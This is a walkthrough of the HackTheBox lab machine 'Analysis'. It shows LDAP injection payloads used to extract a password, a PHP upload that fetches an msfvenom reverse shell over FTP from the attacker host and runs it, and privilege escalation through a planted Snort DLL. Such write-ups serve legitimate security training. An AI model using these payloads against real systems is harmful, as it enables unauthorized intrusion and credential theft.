User flag

Analysis.htb

I started by enumerating the VHosts on the webserver as there was no obvious vulnerability on the website:

1

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://analysis.htb/ -H "Host: FUZZ.analysis.htb"

The only result should be internal.analysis.htb so let’s fuzz more:

1

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://internal.analysis.htb/FUZZ

ffuf findings

After extensive fuzzing, I discovered a PHP file which is interesting:

1

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://internal.analysis.htb/users/FUZZ.php

By now, we have a file named list.php that requires a parameter. To tackle this, we’ll once again use ffuf to bruteforce the parameter name.

1

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://internal.analysis.htb/users/list.php?FUZZ=dong -fs 17

The parameter we searched is called name and seems to be part of an LDAP query, use * to see everything.

ffuf findings

After some research and reading about LDAP injection on Hacktricks, I used ffuf to bruteforce the users’ password.

1
2
3
4
5
6
7

# start with this and look for valid characters with the size of 418
ffuf -w /usr/share/wordlists/seclists/Fuzzing/alphanum-case-extra.txt -u 'http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description=FUZZ*)' -fs 406

# append the valid character in front of the FUZZ until you got the password
ffuf -w /usr/share/wordlists/seclists/Fuzzing/alphanum-case-extra.txt -u 'http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description=9FUZZ*)' -fs 406

ffuf -w /usr/share/wordlists/seclists/Fuzzing/alphanum-case-extra.txt -u 'http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description=97FUZZ*)' -fs 406

🔍 Hint: The password contains a ‘*’, insert it when no other character is found with a size of 418.

Earlier we found a route called /employees, maybe there is some sort of login there.

1

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-files.txt -u http://internal.analysis.htb/employees/FUZZ.php

Indeed there is a login.php that we can log in using the gathered credentials and are presented with a shady file upload.

ffuf findings

I generated a msfvenom reverse shell and a PHP file that downloads it to the machine using cmd.exe over FTP and runs it.

1

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.88 LPORT=4711 -f exe -o /usr/share/tools/tmp/71973864.exe

1

<?php system('cmd.exe /c "@echo open 10.10.14.88 21>gztxpuci.txt&@echo binary>>gztxpuci.txt&@echo GET tmp/71973864.exe >>gztxpuci.txt&@echo quit>>gztxpuci.txt&@ftp -A -s:gztxpuci.txt -v -i&del gztxpuci.txt&71973864.exe"'); ?>

🔍 Hint: msfvenom command and shell are generated using my PentestServerSuite which made this process really easy.

The only thing left to do is finding the uploads folder. To do this I once again used ffuf.

1

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://internal.analysis.htb/dashboard/FUZZ

It did find the uploads folder and of course my PHP file was in it. Run the PHP file and the shell popped.

ffuf findings

Root flag

First thing I did is run winpeas and it did find something in snort where we could place a malicious DLL file.

ffuf findings

Read through the snort config files and we find a DLL file that gets loaded by snort.

ffuf findings

1
2

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.88 LPORT=4713 -f dll -o /usr/share/tools/tmp/14904932.dll
# upload it to -> C:\Snort\lib\snort_dynamicpreprocessor\sf_engine.dll

The box was not too hard and entertained me quite well although the root part was a bit easy.